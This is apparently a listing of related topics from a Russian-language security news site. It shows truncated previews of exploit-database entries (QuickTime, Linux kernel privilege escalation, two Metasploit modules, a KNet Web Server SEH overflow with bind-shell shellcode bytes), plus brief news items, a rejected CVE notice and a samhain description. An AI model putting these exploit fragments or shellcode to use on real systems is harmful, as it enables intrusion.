Смотрите также связанные темы 30.01.2018 Apple QuickTime Player (Windows) Version 7.7.3 Out of Bound Read # Title: Apple Quick Time Player (Windows)Version 7.7.3 Out of Bound Read # Date: 28th January,2013 # Author: Debasish Mandal (https://twitter.com/debasishm89) # Blog : http://www.debasish.in/ # Vendor Homepage: http://www.apple.com/ # Software Link: http://www.apple.com/quicktime/download/ # Version: Apple Quick Time version 7.7.3 # Tested on: Windows XP SP2 / Windows 7 ''' [+] Summary: A memory out of bound read issue exists in Apple Quick Time Player v7.7.3 which can be triggered while trying to open a specially crafted "qtif" image file using Qu...
26.02.2018 Linux Kernel 3.x Privilege Escalation Exploit #include <unistd.h> #include <sys/socket.h> #include <linux/netlink.h> #include <netinet/tcp.h> #include <errno.h> #include <linux/if.h> #include <linux/filter.h> #include <string.h> #include <stdio.h> #include <stdlib.h> #...
18.03.2018 Honeywell HSC Remote Deployer ActiveX Remote Code Execution ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, ...
26.03.2018 HP Intelligent Management Center Arbitrary File Upload Exploit ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super&...
01.04.2018 KNet Web Server 1.04b - Buffer Overflow SEH Exploit #!/usr/bin/ruby # Exploit Title: KNet Web Server Buffer Overflow SEH # Date: 2013-03-27 # Exploit Author: Myo Soe, http://yehg.net/ # Software Link: http://www.softpedia.com/progDownload/KNet-Download-20137.html # Version: KNet 1.04b # Tested on: Windows 7 require 'net/http' require 'uri' require 'socket' ############################################ # bind port 4444 sc_bind = "xbdx0ex27x05xabxdaxdbxd9x74x24xf4x5ax33xc9" + "xb1x56x83xc2x04x31x6ax0fx03x6ax01xc5xf0x57" + "xf5x80xfbxa7x05xf3x72x42x34x21xe0x06x64xf5" + "x62...
18.01.2018 РОСНАНО вложит $230 млн. в зеленоградский завод Plastic Logic Компании договорились об инвестициях в завод по производству пластиковых дисплеев нового поколения, который откроется в Зеленограде в 2013-14 гг. Далее
01.09.2018 DDoS-атака может стоить "ВТБ24" 194 млн рублей "Аэрофлот" подал иск в Арбитражный суд Москвы к банку "ВТБ 24" на 194,2 млн рублей.
09.11.2018 Приложения раскрывают данные пользователей третьим сторонам 93% Android-приложений подключаются к домену safemovedm.com.
02.03.2018 CVE-2016-8000 ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2016-0800. Reason: This candidate is a duplicate of CVE-2016-0800. A typo caused the wrong ID to be used. Notes: All CVE users should reference CVE-2016-0800 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.
19.08.2018 samhain Samhain - проверочное устройство целостности файловой системы, которое может использоваться как пклиент/серверриложение для централизованного контроля связанных в сеть хостов.
|